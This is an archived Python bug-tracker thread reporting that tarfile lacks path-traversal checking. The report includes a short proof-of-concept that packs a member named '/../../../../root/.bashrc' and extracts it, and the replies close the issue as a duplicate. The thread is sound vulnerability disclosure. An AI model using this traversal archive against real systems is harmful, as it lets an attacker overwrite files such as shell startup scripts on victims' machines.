subject:"\[issue45170\] tarfile missing cross\-directory checking"

[issue45170] tarfile missing cross-directory checking

2021-09-20 Thread Martin Panter



Martin Panter  added the comment:

Issue 21109 has been open for a while and is the same as this, if I am not 
mistaken.

--
nosy: +martin.panter
resolution:  -> duplicate
stage:  -> resolved
status: open -> closed
superseder:  -> tarfile: Traversal attack vulnerability

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue45170] tarfile missing cross-directory checking

2021-09-11 Thread Eric V. Smith



Eric V. Smith  added the comment:

This is documented in the tarfile docs:

Warning

Never extract archives from untrusted sources without prior inspection. It is 
possible that files are created outside of path, e.g. members that have 
absolute filenames starting with "/" or filenames with two dots "..".

--
nosy: +eric.smith

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue45170] tarfile missing cross-directory checking

2021-09-11 Thread daji ma



New submission from daji ma :

tarfile missing cross-directory checking, like ../ or ..\, this  potentially 
cause cross-directory decompression.
the exp:
# -*- coding: utf-8 -*-
import tarfile



def extract_tar(file_path, dest_path):
try:
with tarfile.open(file_path, 'r') as src_file:
for info in src_file.getmembers():
src_file.extract(info.name, dest_path)
return True
except (IOError, OSError, tarfile.TarError):
return False


def make_tar():
tar_file=tarfile.open('x.tar.gz','w:gz')
tar_file.add('bashrc', '/../../../../root/.bashrc')
tar_file.list(verbose=True)
tar_file.close()


if __name__ == '__main__':
make_tar()
extract_tar('x.tar.gz', 'xx')

--
components: Library (Lib)
messages: 401631
nosy: xiongpanju
priority: normal
severity: normal
status: open
title: tarfile missing cross-directory checking
type: security
versions: Python 3.8

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue45170] tarfile missing cross-directory checking

[issue45170] tarfile missing cross-directory checking

[issue45170] tarfile missing cross-directory checking

3 matches

Site Navigation

Mail list logo

Footer information